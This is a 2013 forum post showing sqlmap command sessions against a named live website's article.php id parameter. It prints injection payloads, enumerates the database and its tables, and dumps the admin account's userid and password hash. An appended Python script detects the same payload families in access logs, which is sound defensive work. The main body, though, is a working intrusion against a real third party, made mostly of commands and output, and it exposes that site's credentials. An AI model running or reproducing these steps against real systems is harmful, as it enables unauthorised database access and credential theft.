sqlmap worked example: injecting MySQL

Original poster, posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

    shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

    shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

    shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

    shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

    shutting down at: 16:58:14

D:\Python27\sqlmap>
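The five sessions above all rest on the four payload families sqlmap reported for the id parameter (boolean-based, error-based, UNION, time-based). From the defender's side, those payloads are just as visible in the web server's access log; the following Python script, an added example that is not part of the original post, recognises each family in Apache combined-format log lines. The log lines, the 203.0.113.5 client address and the signature set are constructed for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# One signature per payload family sqlmap reported above, plus the CHAR()
# string encoding it uses in both the error-based and UNION payloads.
# Patterns are matched against the URL-decoded, lower-cased query string.
SIGNATURES = {
    "boolean-based blind":    re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+"),
    "error-based":            re.compile(r"floor\(rand\(0\)\*2\)"),
    "UNION query":            re.compile(r"\bunion\s+(all\s+)?select\b"),
    "time-based blind":       re.compile(r"\bsleep\(\s*\d+\s*\)|\bbenchmark\("),
    "CHAR() string encoding": re.compile(r"\bchar\(\d+(,\d+)+\)"),
}

# Apache "combined" access log line; only the request target is needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(target):
    """Return the payload families found in one request target (path + query)."""
    query = unquote_plus(urlsplit(target).query).lower()
    return [name for name, pat in SIGNATURES.items() if pat.search(query)]

def scan_log(lines):
    """Return (client ip, timestamp, families) for each line matching a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue          # not a combined-format line; skip rather than crash
        families = classify_request(m.group("target"))
        if families:
            hits.append((m.group("ip"), m.group("ts"), families))
    return hits

# Constructed sample log: one normal request, then four modelled on the
# payloads sqlmap reported above (client address is a documentation IP).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 312',
    '203.0.113.5 - - [04/Apr/2013:16:53:57 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(CHAR(58,99,118,120,58))%23 HTTP/1.1" 200 4800',
    '203.0.113.5 - - [04/Apr/2013:16:53:58 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, ts, families in scan_log(SAMPLE_LOG):
        print(f"{ip} [{ts}] {', '.join(families)}")
```

A burst of hits from one client across several families within seconds, as in the sample, is the characteristic footprint of an automated scanner rather than a single hand-typed probe; the same output also reminds that the application above runs its queries as root@localhost, so any one of these families yields the whole server's data rather than one schema.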